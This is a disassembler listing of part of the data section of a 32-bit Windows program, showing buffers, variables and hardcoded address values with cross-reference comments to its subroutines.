byte_4B5245 db 3 dup(0) ; DATA XREF: .data:off_44F8A0�o
dd 102h dup(0)
db 3 dup(0)
byte_4B5653 db 0 ; DATA XREF: .data:00454BE4�o
dd 3BBBh dup(0)
db 2 dup(0)
word_4C4542 dw 0 ; DATA XREF: .data:0045480C�o
dword_4C4544 dd 0BFh dup(0) ; DATA XREF: .data:00454D3C�o
db 3 dup(0)
byte_4C4843 db 0 ; DATA XREF: .data:00454AF8�o
dd 180h dup(0)
db 0
byte_4C4E45 db 3 dup(0) ; DATA XREF: .data:00454CB4�o
dd 3Eh dup(0)
db 3 dup(0)
byte_4C4F43 db 0 ; DATA XREF: .data:00454A48�o
dd 0C0h dup(0)
db 2 dup(0)
word_4C5246 dw 0 ; DATA XREF: .data:00454964�o
; .data:00454D1C�o
dd 3Fh dup(0)
db 0
byte_4C5345 db 3 dup(0) ; DATA XREF: .data:00454AF0�o
; .data:00454D8C�o
db 0
byte_4C5349 db 3 dup(0) ; DATA XREF: .data:00454754�o
; .data:0045475C�o
dd 1C0h dup(0)
db 2 dup(0)
word_4C5A4E dw 0 ; DATA XREF: .data:00454BBC�o
; .data:00454BC4�o
dd 39C0h dup(0)
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: .data:off_44EAE8�o
dd 37Ch dup(0)
dword_4D4F44 dd 100h dup(0) ; DATA XREF: .data:004549F0�o
db 0
byte_4D5345 db 3 dup(0) ; DATA XREF: .data:004547D8�o
; .data:00454DCC�o
dd 3Fh dup(0)
db 3 dup(0)
byte_4D5447 db 0 ; DATA XREF: .data:004548E8�o
dd 3674h dup(0)
dword_4E2E18 dd 2BECh ; DATA XREF: sub_401317+FD�w
; sub_40B756+13�o ...
dword_4E2E1C dd 1Fh ; DATA XREF: WinMain(x,x,x,x)+3D�w
; sub_401CC7:loc_4046C2�r ...
dword_4E2E20 dd 0 ; DATA XREF: WinMain(x,x,x,x):loc_4018F9�o
; char Dest[]
Dest db 80h dup(0) ; DATA XREF: WinMain(x,x,x,x)+495�o
; WinMain(x,x,x,x)+52F�o ...
; char byte_4E2EA4[]
byte_4E2EA4 db 40h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4AB�o
; char byte_4E2EE4[]
byte_4E2EE4 db 90h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4C2�o
dword_4E2F74 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4B6�w
; WinMain(x,x,x,x)+546�w ...
dword_4E2F78 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4D5�w
dd 3 dup(0)
dword_4E2F88 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4E3�w
; WinMain(x,x,x,x)+4FA�r ...
dword_4E2F8C dd 0 ; DATA XREF: WinMain(x,x,x,x)+49A�w
; sub_401CC7+8A9�r
dword_4E2F90 dd 0 ; DATA XREF: .data:0043F264�o
dword_4E2F94 dd 0 ; DATA XREF: WinMain(x,x,x,x)+24D�o
; char byte_4E2F98[]
byte_4E2F98 db 4 dup(0) ; DATA XREF: sub_401CC7+7E87�o
dword_4E2F9C dd 0 ; DATA XREF: sub_401CC7+232C�o
; char byte_4E2FA0[]
byte_4E2FA0 db 4 dup(0) ; DATA XREF: sub_401CC7+1EE0�o
; char byte_4E2FA4[]
byte_4E2FA4 db 4 dup(0) ; DATA XREF: sub_401CC7+40C3�o
; char byte_4E2FA8[]
byte_4E2FA8 db 4 dup(0) ; DATA XREF: sub_401CC7+4215�o
; char byte_4E2FAC[]
byte_4E2FAC db 4 dup(0) ; DATA XREF: sub_401CC7+449F�o
; char byte_4E2FB0[]
byte_4E2FB0 db 4 dup(0) ; DATA XREF: sub_401CC7+5C4B�o
dword_4E2FB4 dd 77C72C6Bh ; DATA XREF: sub_409DD4+4A7�w
; sub_409DD4+4EB�r ...
dword_4E2FB8 dd 77EBA994h ; DATA XREF: sub_409DD4+65�w
; sub_41A589+166�r
dword_4E2FBC dd 7622A3F4h ; DATA XREF: sub_409DD4+80B�w
; sub_409DD4+880�r ...
dword_4E2FC0 dd 71C45229h ; DATA XREF: sub_409DD4+9D8�w
; sub_409DD4+A43�r ...
dword_4E2FC4 dd 71C24870h ; DATA XREF: sub_409DD4+98A�w
; sub_409DD4+A13�r ...
dword_4E2FC8 dd 77C71BB0h ; DATA XREF: sub_409DD4+48D�w
; sub_409DD4+4DB�r ...
dword_4E2FCC dd 77D4808Bh ; DATA XREF: sub_409DD4+213�w
; sub_409DD4+234�r ...
dword_4E2FD0 dd 71C4502Ch ; DATA XREF: sub_409DD4+9CB�w
; sub_409DD4+A3B�r ...
dword_4E2FD4 dd 77DE801Bh ; DATA XREF: sub_409DD4+372�w
; sub_409DD4+3C7�r ...
dword_4E2FD8 dd 77DDACABh ; DATA XREF: sub_409DD4+40F�w
; sub_41B92C+11E�r
dword_4E2FDC dd 77DE8075h ; DATA XREF: sub_409DD4+37F�w
; sub_409DD4+3CF�r ...
dword_4E2FE0 dd 77DD7496h ; DATA XREF: sub_409DD4+3C0�w
; sub_419B5B+AD�r
dword_4E2FE4 dd 71AB1B7Bh ; DATA XREF: sub_409DD4+55A�w
; sub_40FB50+115�r ...
dword_4E2FE8 dd 77E686CCh ; DATA XREF: sub_409DD4+72�w
; sub_409DD4+D2�r ...
dword_4E2FEC dd 71C2498Bh ; DATA XREF: sub_409DD4+97D�w
; sub_409DD4+A06�r ...
dword_4E2FF0 dd 77DDAB2Fh ; DATA XREF: sub_409DD4+3A6�w
; sub_409DD4+3E7�r ...
dword_4E2FF4 dd 7620E8C3h ; DATA XREF: sub_409DD4+859�w
; sub_409DD4+8AC�r ...
dword_4E2FF8 dd 77DD23D7h ; DATA XREF: sub_409DD4+2A5�w
; sub_409DD4+2F0�r ...
dword_4E2FFC dd 76214750h ; DATA XREF: sub_409DD4+84C�w
; sub_409DD4+8A4�r ...
dword_4E3000 dd 77E6D75Bh ; DATA XREF: sub_409DD4+B3�w
dword_4E3004 dd 7620BD61h ; DATA XREF: sub_409DD4+866�w
; sub_409DD4+8B4�r ...
dword_4E3008 dd 71AB60C9h ; DATA XREF: sub_409DD4+54D�w
; sub_409DD4+6D0�r ...
dword_4E300C dd 77EBA6E9h ; DATA XREF: sub_409DD4+58�w
; sub_409DD4+CA�r ...
dword_4E3010 dd 76D62A58h ; DATA XREF: sub_409DD4+934�w
; sub_413D05+11A�r
dword_4E3014 dd 76F36EAAh ; DATA XREF: sub_401CC7:loc_404110�r
; sub_409DD4+A95�w ...
dword_4E3018 dd 77E802FCh ; DATA XREF: sub_409DD4+A6�w
; sub_409DD4+F2�r ...
dword_4E301C dd 77C75455h ; DATA XREF: sub_409DD4+480�w
; sub_409DD4+4D3�r ...
dword_4E3020 dd 71AB12A7h ; DATA XREF: sub_409DD4+5F6�w
; sub_40C603+20�r ...
dword_4E3024 dd 71C574FAh ; DATA XREF: sub_409DD4+9BE�w
; sub_409DD4+A33�r
dword_4E3028 dd 71AB1746h ; DATA XREF: sub_409DD4+5E9�w
; sub_409DD4+754�r ...
dword_4E302C dd 71C21CA3h ; DATA XREF: sub_409DD4+A0C�w
dword_4E3030 dd 71B28D0Dh ; DATA XREF: sub_409DD4+B50�w
dword_4E3034 dd 762211EFh ; DATA XREF: sub_409DD4+7FE�w
; sub_409DD4+86D�r
dword_4E3038 dd 77D902E3h ; DATA XREF: sub_409DD4+1B3�w
; sub_4190D4+15�r
dword_4E303C dd 71C2FA86h ; DATA XREF: sub_409DD4+997�w
; sub_409DD4+A1B�r ...
dword_4E3040 dd 77DE1291h ; DATA XREF: sub_409DD4+38C�w
; sub_409DD4+3D7�r ...
dword_4E3044 dd 77E2C1B3h ; DATA XREF: sub_409DD4+399�w
; sub_409DD4+3DF�r ...
dword_4E3048 dd 73B81E3Bh ; DATA XREF: sub_409DD4+C85�w
; sub_409DD4+C8C�r ...
dword_4E304C dd 71ABF628h ; DATA XREF: sub_409DD4+6AC�w
; sub_411240+D0�r
dword_4E3050 dd 71AB1836h ; DATA XREF: sub_401317+1D�r
; sub_401317+23�r ...
dword_4E3054 dd 77C72889h ; DATA XREF: sub_409DD4+4B4�w
; sub_415F1E+207�r
dword_4E3058 dd 71C453F8h ; DATA XREF: sub_409DD4+9E5�w
; sub_409DD4+A4B�r ...
dword_4E305C dd 77DD5C55h ; DATA XREF: sub_401000+51�r
; sub_409DD4+2B2�w ...
dword_4E3060 dd 77E96645h ; DATA XREF: sub_409DD4+7F�w
; sub_409DD4+DA�r ...
dword_4E3064 dd 77428B97h ; DATA XREF: sub_401CC7+5992�r
; sub_401CC7+7A8A�r ...
dword_4E3068 dd 71AB41DAh ; DATA XREF: WinMain(x,x,x,x)+8C�r
; sub_401CC7+5198�r ...
dword_4E306C dd 762059A3h ; DATA XREF: sub_409DD4+825�w
; sub_409DD4+890�r ...
dword_4E3070 dd 71C4A1B4h ; DATA XREF: sub_409DD4+9A4�w
; sub_409DD4+A23�r
dword_4E3074 dd 1F7CD214h ; DATA XREF: sub_409DD4+C0E�w
; sub_409DD4+C3F�r
dword_4E3078 dd 77E09134h ; DATA XREF: sub_409DD4+2CC�w
; sub_41927E+47�r
dword_4E307C dd 77D4456Bh ; DATA XREF: sub_409DD4+22D�w
; sub_412775+40�r ...
dword_4E3080 dd 76D629BBh ; DATA XREF: sub_409DD4+91A�w
; sub_409DD4+92E�r ...
dword_4E3084 dd 1F7B9D96h ; DATA XREF: sub_409DD4+C28�w
dword_4E3088 dd 77E09070h ; DATA XREF: sub_409DD4+2D9�w
; sub_41927E+4F�r
dword_4E308C dd 71AB1740h ; DATA XREF: sub_409DD4+574�w
; sub_409DD4+6E8�r ...
dword_4E3090 dd 7620AFB6h ; DATA XREF: sub_409DD4+83F�w
; sub_409DD4+873�r
dword_4E3094 dd 77D5C13Ah ; DATA XREF: sub_409DD4+220�w
; sub_409DD4+23C�r ...
dword_4E3098 dd 77D45B19h ; DATA XREF: sub_409DD4+172�w
; sub_409DD4+1C2�r ...
dword_4E309C dd 71AB157Eh ; DATA XREF: sub_401CC7+1E21�r
; sub_401CC7+5B48�r ...
dword_4E30A0 dd 71AB3E5Dh ; DATA XREF: sub_4019E7+C4�r
; sub_401CC7+5222�r ...
dword_4E30A4 dd 71AB14DCh ; DATA XREF: sub_409DD4+567�w
; sub_409DD4+6DC�r ...
dword_4E30A8 dd 0CC0004h ; DATA XREF: sub_409DD4+8DB�w
; sub_409DD4:loc_40A6CD�w ...
dword_4E30AC dd 77DD590Bh ; DATA XREF: sub_401000+26�r
; sub_409DD4+28B�w ...
dword_4E30B0 dd 71ABD755h ; DATA XREF: sub_401CC7+7A0F�r
; sub_409DD4+69F�w ...
dword_4E30B4 dd 77DF7311h ; DATA XREF: sub_409DD4+32D�w
; sub_409DD4+341�r ...
dword_4E30B8 dd 77DDA2AFh ; DATA XREF: sub_409DD4+3B3�w
; sub_409DD4+3EF�r ...
dword_4E30BC dd 1F7CD927h ; DATA XREF: sub_409DD4+C01�w
; sub_409DD4+C37�r
dword_4E30C0 dd 76206853h ; DATA XREF: sub_409DD4+818�w
; sub_409DD4+888�r ...
dword_4E30C4 dd 77D4932Ch ; DATA XREF: sub_409DD4+206�w
; sub_409DD4+227�r ...
dword_4E30C8 dd 77D5E310h ; DATA XREF: sub_409DD4+18C�w
; sub_409DD4+1D2�r ...
dword_4E30CC dd 76206B7Fh ; DATA XREF: sub_409DD4+832�w
; sub_409DD4+898�r ...
dword_4E30D0 dd 71AB1444h ; DATA XREF: sub_409DD4+624�w
; sub_409DD4+774�r ...
dword_4E30D4 dd 77DD189Ah ; DATA XREF: sub_401000+5A�r
; sub_409DD4+2BF�w ...
dword_4E30D8 dd 71AB3F8Dh ; DATA XREF: sub_409DD4+66B�w
; sub_409DD4+79C�r ...
dword_4E30DC dd 77DD5D20h ; DATA XREF: sub_409DD4+320�w
; sub_409DD4+334�r ...
dword_4E30E0 dd 71AB1890h ; DATA XREF: sub_409DD4+644�w
; sub_409DD4+784�r ...
dword_4E30E4 dd 77C76B34h ; DATA XREF: sub_409DD4+44C�w
; sub_409DD4+4AE�r ...
dword_4E30E8 dd 77D5E38Ch ; DATA XREF: sub_409DD4+199�w
; sub_409DD4+1DA�r ...
dword_4E30EC dd 77DDA20Bh ; DATA XREF: sub_409DD4+365�w
; sub_409DD4+3BA�r ...
dword_4E30F0 dd 76F36EEBh ; DATA XREF: sub_409DD4+AA2�w
dword_4E30F4 dd 71AB12A7h ; DATA XREF: sub_409DD4+5DC�w
; sub_409DD4+748�r ...
dword_4E30F8 dd 71AB1746h ; DATA XREF: sub_4019E7+3E�r
; sub_401CC7+51D4�r ...
dword_4E30FC dd 77EBA595h ; DATA XREF: sub_409DD4+4B�w
; sub_409DD4+C2�r ...
dword_4E3100 dd 77C7531Dh ; DATA XREF: sub_409DD4+473�w
; sub_409DD4+4CB�r ...
dword_4E3104 dd 77D4BDCAh ; DATA XREF: sub_409DD4+165�w
; sub_409DD4+1BA�r ...
dword_4E3108 dd 71C3516Ah ; DATA XREF: sub_409DD4+9FF�w
; sub_409DD4+A5B�r ...
dword_4E310C dd 71AB32CAh ; DATA XREF: sub_409DD4+685�w
; sub_409DD4+7AC�r ...
dword_4E3110 dd 71AB5690h ; DATA XREF: sub_401B4F+D1�r
; sub_401CC7+5237�r ...
dword_4E3114 dd 1F7CB8F8h ; DATA XREF: sub_409DD4+C1B�w
; sub_409DD4+C47�r
dword_4E3118 dd 77EBB1E7h ; DATA XREF: sub_409DD4+3E�w
; sub_409DD4+BA�r ...
dword_4E311C dd 77DD59F0h ; DATA XREF: sub_401000+45�r
; sub_409DD4+298�w ...
dword_4E3120 dd 71AB5DE2h ; DATA XREF: sub_409DD4+651�w
; sub_409DD4+78C�r ...
dword_4E3124 dd 71AB3ECEh ; DATA XREF: sub_409DD4+637�w
; sub_409DD4+77C�r ...
dword_4E3128 dd 73B81B0Fh ; DATA XREF: sub_401CC7+7462�r
; sub_409DD4+C92�w
dword_4E312C dd 76204E4Dh ; DATA XREF: sub_409DD4+879�w
; sub_416F62+4DC�r ...
dword_4E3130 dd 0 ; DATA XREF: sub_409DD4+112�w
dword_4E3134 dd 1F7D886Ah ; DATA XREF: sub_409DD4+BE7�w
; sub_409DD4+C22�r
dword_4E3138 dd 71AB12F8h ; DATA XREF: sub_401CC7+2FDE�r
; sub_401CC7+6019�r ...
dword_4E313C dd 77C76551h ; DATA XREF: sub_409DD4+459�w
; sub_409DD4+4BB�r ...
dword_4E3140 dd 77C729E2h ; DATA XREF: sub_409DD4+49A�w
; sub_409DD4+4E3�r ...
dword_4E3144 dd 77C7212Fh ; DATA XREF: sub_409DD4+466�w
; sub_409DD4+4C3�r ...
dword_4E3148 dd 71AB1AF4h ; DATA XREF: sub_401B4F+89�r
; sub_401CC7+5254�r ...
dword_4E314C dd 77D5E303h ; DATA XREF: sub_409DD4+1A6�w
; sub_409DD4+1E2�r ...
dword_4E3150 dd 71C4576Ch ; DATA XREF: sub_409DD4+9F2�w
; sub_409DD4+A53�r ...
dword_4E3154 dd 77D4702Fh ; DATA XREF: sub_409DD4+158�w
; sub_409DD4+1AD�r ...
dword_4E3158 dd 77E6C0E3h ; DATA XREF: sub_409DD4+8C�w
; sub_409DD4+E2�r ...
dword_4E315C dd 71AB1ED3h ; DATA XREF: sub_409DD4+610�w
; sub_409DD4+764�r ...
dword_4E3160 dd 71B2A381h ; DATA XREF: sub_409DD4+B43�w
; sub_409DD4+B5F�r
dword_4E3164 dd 77DDA595h ; DATA XREF: sub_409DD4+33A�w
; sub_41A51E+55�r
dword_4E3168 dd 77DD22EAh ; DATA XREF: sub_409DD4+27E�w
; sub_409DD4+2D3�r ...
dword_4E316C dd 773F97B0h ; DATA XREF: sub_409DD4+BAA�w
dword_4E3170 dd 76D67A29h ; DATA XREF: sub_409DD4+AEC�w
; sub_40AE8D+D4�r
dword_4E3174 dd 76D674FAh ; DATA XREF: sub_409DD4+ADF�w
; sub_409DD4+AE6�r ...
dword_4E3178 dd 71AB3C22h ; DATA XREF: sub_4019E7+A6�r
; sub_401CC7+51B3�r ...
dword_4E317C dd 71AB2BBFh ; DATA XREF: sub_401CC7+51A5�r
; sub_401CC7+7A36�r ...
dword_4E3180 dd 1F7BA3A9h ; DATA XREF: sub_409DD4+BF4�w
; sub_409DD4+C2F�r
dword_4E3184 dd 71AB401Ch ; DATA XREF: sub_401CC7+1E47�r
; sub_401CC7+5B6E�r ...
dword_4E3188 dd 71C214BAh ; DATA XREF: sub_409DD4+9B1�w
; sub_409DD4+A2B�r ...
dword_4E318C dd 71AB868Dh ; DATA XREF: sub_409DD4+65E�w
; sub_409DD4+794�r ...
dword_4E3190 dd 71AB1A6Dh ; DATA XREF: sub_401317+12�r
; sub_4019E7+D0�r ...
dword_4E3194 dd 71AB155Ah ; DATA XREF: sub_409DD4+59B�w
; sub_409DD4+70C�r ...
dword_4E3198 dd 71B22C25h ; DATA XREF: sub_409DD4+B36�w
; sub_409DD4+B57�r
dword_4E319C dd 71AB5A01h ; DATA XREF: sub_409DD4+540�w
; sub_409DD4+6C4�r ...
dword_4E31A0 dd 71B2ACCBh ; DATA XREF: sub_409DD4+B29�w
; sub_409DD4+B4A�r
dword_4E31A4 dd 77E78C17h ; DATA XREF: WinMain(x,x,x,x)+52�r
; sub_409DD4+31�w ...
dword_4E31A8 dd 77D49A11h ; DATA XREF: sub_409DD4+17F�w
; sub_409DD4+1CA�r ...
align 10h
dword_4E31B0 dd 76D62A37h ; DATA XREF: sub_409DD4+927�w
; sub_409DD4+93B�r ...
dword_4E31B4 dd 77E6CBF9h ; DATA XREF: sub_409DD4+99�w
; sub_409DD4+EA�r ...
dword_4E31B8 dd 0 ; DATA XREF: sub_409DD4:loc_409ED2�w
; sub_409DD4+12B�w ...
dword_4E31BC dd 0 ; DATA XREF: sub_409DD4+126�w
; sub_40AA90+1C�r
dword_4E31C0 dd 0 ; DATA XREF: sub_409DD4:loc_409FC2�w
; sub_409DD4:loc_40A029�w ...
dword_4E31C4 dd 0 ; DATA XREF: sub_409DD4+250�w
; sub_40AA90+50�r
dword_4E31C8 dd 0 ; DATA XREF: WinMain(x,x,x,x)+349�r
; sub_401CC7+455F�r ...
dword_4E31CC dd 0 ; DATA XREF: sub_409DD4+41E�w
; sub_40AA90+84�r
dword_4E31D0 dd 0 ; DATA XREF: sub_409DD4:loc_40A2D8�w
; sub_40AA90:loc_40AB40�r
dword_4E31D4 dd 0 ; DATA XREF: sub_409DD4+4FF�w
; sub_40AA90+B8�r
dword_4E31D8 dd 0 ; DATA XREF: sub_409DD4:loc_40A5A9�w
; sub_40AA90:loc_40AB74�r
dword_4E31DC dd 0 ; DATA XREF: sub_409DD4+7D0�w
; sub_40AA90+EC�r
dword_4E31E0 dd 0 ; DATA XREF: sub_409DD4:loc_40A694�w
; sub_409DD4+8EF�w ...
dword_4E31E4 dd 0 ; DATA XREF: sub_409DD4+8EA�w
; sub_40AA90+120�r
dword_4E31E8 dd 0 ; DATA XREF: sub_401CC7:loc_407192�r
; sub_409DD4:loc_40A728�w ...
dword_4E31EC dd 0 ; DATA XREF: sub_409DD4+94F�w
; sub_40AA90+154�r
dword_4E31F0 dd 0 ; DATA XREF: sub_401CC7+4567�r
; sub_409DD4:loc_40A844�w ...
dword_4E31F4 dd 0 ; DATA XREF: sub_409DD4+A6B�w
; sub_40AA90+188�r
dword_4E31F8 dd 0 ; DATA XREF: sub_409DD4:loc_40A88E�w
; sub_40AA90:loc_40AC44�r
dword_4E31FC dd 0 ; DATA XREF: sub_409DD4+AB5�w
; sub_40AA90+1BC�r
dword_4E3200 dd 0 ; DATA XREF: sub_409DD4:loc_40A8D8�w
; sub_40AA90:loc_40AC78�r
dword_4E3204 dd 0 ; DATA XREF: sub_409DD4+AFF�w
; sub_40AA90+1F0�r
dword_4E3208 dd 0 ; DATA XREF: sub_409DD4:loc_40A94C�w
; sub_40AA90:loc_40ACAC�r
dword_4E320C dd 0 ; DATA XREF: sub_409DD4+B73�w
; sub_40AA90+224�r
dword_4E3210 dd 0 ; DATA XREF: sub_409DD4:loc_40A996�w
; sub_40AA90:loc_40ACE0�r
dword_4E3214 dd 0 ; DATA XREF: sub_409DD4+BBD�w
; sub_40AA90+258�r
dword_4E3218 dd 0 ; DATA XREF: sub_409DD4:loc_40AA34�w
; sub_40AA90:loc_40AD14�r
dword_4E321C dd 0 ; DATA XREF: sub_409DD4+C5B�w
; sub_40AA90+28C�r
dword_4E3220 dd 0 ; DATA XREF: sub_409DD4:loc_40AA7E�w
; sub_40AA90:loc_40AD48�r
dword_4E3224 dd 0 ; DATA XREF: sub_409DD4+CA5�w
; sub_40AA90+2C0�r
; char byte_4E3228[]
byte_4E3228 db 14h dup(0) ; DATA XREF: sub_40AF71+32�o
dword_4E323C dd 2 dup(0) ; DATA XREF: .text:0040ADCC�o
dword_4E3244 dd 0 ; DATA XREF: sub_40B29D+12�o
dword_4E3248 dd 0 ; DATA XREF: sub_40B3A7+33�o
dword_4E324C dd 0 ; DATA XREF: sub_40B3A7+63�o
byte_4E3250 db 0 ; DATA XREF: sub_40B64F+6A�r
; sub_40B64F+98�w
align 8
dword_4E3258 dd 0 ; DATA XREF: sub_40C0B6+18�r
; sub_40C603+9�o ...
dword_4E325C dd 0 ; DATA XREF: sub_40C951+4D�r
; sub_40CB69+D9�w ...
dd 3B8h dup(0)
db 3 dup(0)
byte_4E4143 db 0 ; DATA XREF: .data:004548BC�o
dd 2 dup(0)
dword_4E414C dd 0 ; DATA XREF: .data:off_4517C8�o
dword_4E4150 dd 101h dup(0) ; DATA XREF: .data:00454998�o
db 2 dup(0)
word_4E4556 dw 0 ; DATA XREF: .data:00454A1C�o
dd 0BAh dup(0)
db 3 dup(0)
byte_4E4843 db 0 ; DATA XREF: .data:00454B8C�o
; .data:00454BCC�o ...
dd 40h dup(0)
db 2 dup(0)
word_4E4946 dw 0 ; DATA XREF: .data:004546FC�o
; .data:00454704�o
dd 181h dup(0)
db 2 dup(0)
word_4E4F4E dw 0 ; DATA XREF: .data:00454D6C�o
dd 0C2h dup(0)
dword_4E5258 dd 6 dup(0) ; DATA XREF: sub_40C951+D2�o
; sub_40C951+13B�o ...
dword_4E5270 dd 0 ; DATA XREF: sub_40C12D+2C4�w
; sub_40C12D+348�o
dword_4E5274 dd 0 ; DATA XREF: sub_40C12D+33E�w
; sub_40C12D+35A�r
dword_4E5278 dd 0 ; DATA XREF: sub_40C12D+2CF�w
dword_4E527C dd 0 ; DATA XREF: sub_40C12D+2B9�w
; sub_40C12D:loc_40C442�r
; char byte_4E5280[]
byte_4E5280 db 80h dup(0) ; DATA XREF: sub_40C12D+2E2�o
; sub_40C12D+302�o
dword_4E5300 dd 0 ; DATA XREF: sub_40C12D+2D5�w
dword_4E5304 dd 0 ; DATA XREF: sub_40C12D+2EF�w
; sub_40C12D+30F�w
dword_4E5308 dd 0 ; DATA XREF: sub_40C12D:loc_40C49D�r
align 10h
dword_4E5310 dd 0 ; DATA XREF: sub_40C12D+82�w
; sub_40C12D+101�o
dword_4E5314 dd 0Ch dup(0) ; DATA XREF: sub_40C12D+41�o
db 0
byte_4E5345 db 3 dup(0) ; DATA XREF: .data:00454888�o
; .data:00454DD4�o
dd 34h dup(0)
; char byte_4E5418[]
byte_4E5418 db 104h dup(0) ; DATA XREF: sub_40C12D+69�o
dword_4E551C dd 0 ; DATA XREF: sub_40C12D+F7�w
; sub_40C12D+113�r
dword_4E5520 dd 0 ; DATA XREF: sub_40C12D+52�w
dword_4E5524 dd 0 ; DATA XREF: sub_40C12D+4D�w
; sub_40C12D+D4�r
; char byte_4E5528[]
byte_4E5528 db 80h dup(0) ; DATA XREF: sub_40C12D+9A�o
; sub_40C12D+BA�o
dword_4E55A8 dd 0 ; DATA XREF: sub_40C12D+8F�w
dword_4E55AC dd 0 ; DATA XREF: sub_40C12D+A7�w
; sub_40C12D+C7�w
dword_4E55B0 dd 0 ; DATA XREF: sub_40C12D:loc_40C256�r
align 8
dword_4E55B8 dd 0 ; DATA XREF: sub_40C12D+1A5�w
; sub_40C12D+225�o
dword_4E55BC dd 41h dup(0) ; DATA XREF: sub_40C12D+167�o
; char byte_4E56C0[]
byte_4E56C0 db 104h dup(0) ; DATA XREF: sub_40C12D+18C�o
dword_4E57C4 dd 0 ; DATA XREF: sub_40C12D+21B�w
; sub_40C12D+237�r
dword_4E57C8 dd 0 ; DATA XREF: sub_40C12D+17A�w
dword_4E57CC dd 0 ; DATA XREF: sub_40C12D+175�w
; sub_40C12D+1F8�r
; char byte_4E57D0[]
byte_4E57D0 db 80h dup(0) ; DATA XREF: sub_40C12D+1BE�o
; sub_40C12D+1DE�o
dword_4E5850 dd 0 ; DATA XREF: sub_40C12D+1B1�w
dword_4E5854 dd 0 ; DATA XREF: sub_40C12D+1CB�w
; sub_40C12D+1EB�w
dword_4E5858 dd 0 ; DATA XREF: sub_40C12D:loc_40C37A�r
align 10h
dword_4E5860 dd 0 ; DATA XREF: sub_40C12D+417�w
; sub_40C12D+470�o
; char byte_4E5864[]
byte_4E5864 db 288h dup(0) ; DATA XREF: sub_40C12D+405�o
; char byte_4E5AEC[]
byte_4E5AEC db 104h dup(0) ; DATA XREF: sub_40C12D+3CF�o
dword_4E5BF0 dd 0 ; DATA XREF: sub_40C12D+3FC�w
; sub_40C12D+423�r
align 8
dword_4E5BF8 dd 0 ; DATA XREF: sub_40C12D+466�w
; sub_40C12D+482�r
dword_4E5BFC dd 0 ; DATA XREF: sub_40C12D+429�w
dword_4E5C00 dd 0 ; DATA XREF: sub_40C12D+436�w
dword_4E5C04 dd 0 ; DATA XREF: sub_40C12D+3F6�w
dd 0
dword_4E5C0C dd 0 ; DATA XREF: sub_40C12D:loc_40C5C5�r
dd 0
dword_4E5C14 dd 0 ; DATA XREF: sub_40BD79+E�r
; sub_40BD79+32�r ...
dword_4E5C18 dd 0 ; DATA XREF: sub_40BD79+9�r
; sub_40BD79+26�r ...
; char byte_4E5C1C[]
byte_4E5C1C db 208h dup(0) ; DATA XREF: sub_40CDC8+8D�o
dword_4E5E24 dd 2 dup(0) ; DATA XREF: sub_40D75F+68�o
dword_4E5E2C dd 0 ; DATA XREF: sub_40D1FF+13�o
dword_4E5E30 dd 0 ; DATA XREF: sub_40DA4E+10�o
dword_4E5E34 dd 2080Ah ; DATA XREF: sub_40E2CB+8�w
; sub_40E3C7+2D6�o
dd 0
dword_4E5E3C dd 0 ; DATA XREF: sub_40E3C7+64�o
dword_4E5E40 dd 0 ; DATA XREF: sub_40E3C7+69�o
dword_4E5E44 dd 3 dup(0) ; DATA XREF: sub_40E3C7+20C�o
dword_4E5E50 dd 0 ; DATA XREF: sub_40EC5E+148�o
dword_4E5E54 dd 0 ; DATA XREF: sub_40EF29+1F�r
; sub_40EF74+BC�o ...
dword_4E5E58 dd 0 ; DATA XREF: sub_40EF74+B7�o
; sub_40EF74+DA�r ...
dword_4E5E5C dd 0 ; DATA XREF: sub_40EF74+9A�o
; sub_40EF74+CF�r ...
dword_4E5E60 dd 0 ; DATA XREF: sub_40EEE6+35�r
; sub_40EF74+95�o ...
dword_4E5E64 dd 0 ; DATA XREF: sub_40EEE6+17�r
; sub_40EF29+3D�r ...
dd 0
dword_4E5E6C dd 2AE3h ; DATA XREF: sub_40C12D+2AE�r
; sub_40F149+10�w ...
dd 0
dword_4E5E74 dd 0 ; DATA XREF: sub_40BDE5+1C�r
; sub_40F160+27C�w
dword_4E5E78 dd 0 ; DATA XREF: sub_40FA39+2A�w
; sub_40FA39+51�r ...
dd 3 dup(0)
dword_4E5E88 dd 3 dup(0) ; DATA XREF: sub_410B5C+74�o
dword_4E5E94 dd 0 ; DATA XREF: sub_411240+146�r
dd 0
dword_4E5E9C dd 2 dup(0) ; DATA XREF: sub_411240+139�o
byte_4E5EA4 db 0 ; DATA XREF: sub_412217+1EF�r
align 4
dword_4E5EA8 dd 0 ; DATA XREF: sub_412DD2+4�w
; sub_412DD2+9�o
align 10h
byte_4E5EB0 db 0 ; DATA XREF: sub_41391E+1D3�w
; sub_41391E+2D2�o
align 2
word_4E5EB2 dw 0 ; DATA XREF: sub_41391E+1E3�w
word_4E5EB4 dw 0 ; DATA XREF: sub_41391E+1E9�w
word_4E5EB6 dw 0 ; DATA XREF: sub_41391E+1F0�w
byte_4E5EB8 db 0 ; DATA XREF: sub_41391E+1F7�w
byte_4E5EB9 db 0 ; DATA XREF: sub_41391E+1FE�w
word_4E5EBA dw 0 ; DATA XREF: sub_41391E+204�w
dword_4E5EBC dd 0 ; DATA XREF: sub_41391E+234�w
; sub_41391E+250�w
dword_4E5EC0 dd 0 ; DATA XREF: sub_41391E+258�w
byte_4E5EC4 db 0 ; DATA XREF: sub_41391E+26A�w
byte_4E5EC5 db 0 ; DATA XREF: sub_41391E+27D�w
word_4E5EC6 dw 0 ; DATA XREF: sub_41391E+295�w
word_4E5EC8 dw 0 ; DATA XREF: sub_41391E+2A4�w
word_4E5ECA dw 0 ; DATA XREF: sub_41391E+29C�w
dword_4E5ECC dd 101h dup(0) ; DATA XREF: sub_41391E+2B9�o
; char byte_4E62D0[]
byte_4E62D0 db 200h dup(0) ; DATA XREF: sub_401CC7+2F63�o
; sub_401CC7:loc_404CB8�o ...
byte_4E64D0 db 0 ; DATA XREF: sub_4151C6+1A1�w
; sub_4151C6+27A�o
align 2
word_4E64D2 dw 0 ; DATA XREF: sub_4151C6+1AE�w
word_4E64D4 dw 0 ; DATA XREF: sub_4151C6+1B8�w
word_4E64D6 dw 0 ; DATA XREF: sub_4151C6+1C1�w
byte_4E64D8 db 0 ; DATA XREF: sub_4151C6+1C8�w
byte_4E64D9 db 0 ; DATA XREF: sub_4151C6+1CF�w
word_4E64DA dw 0 ; DATA XREF: sub_4151C6+1D6�w
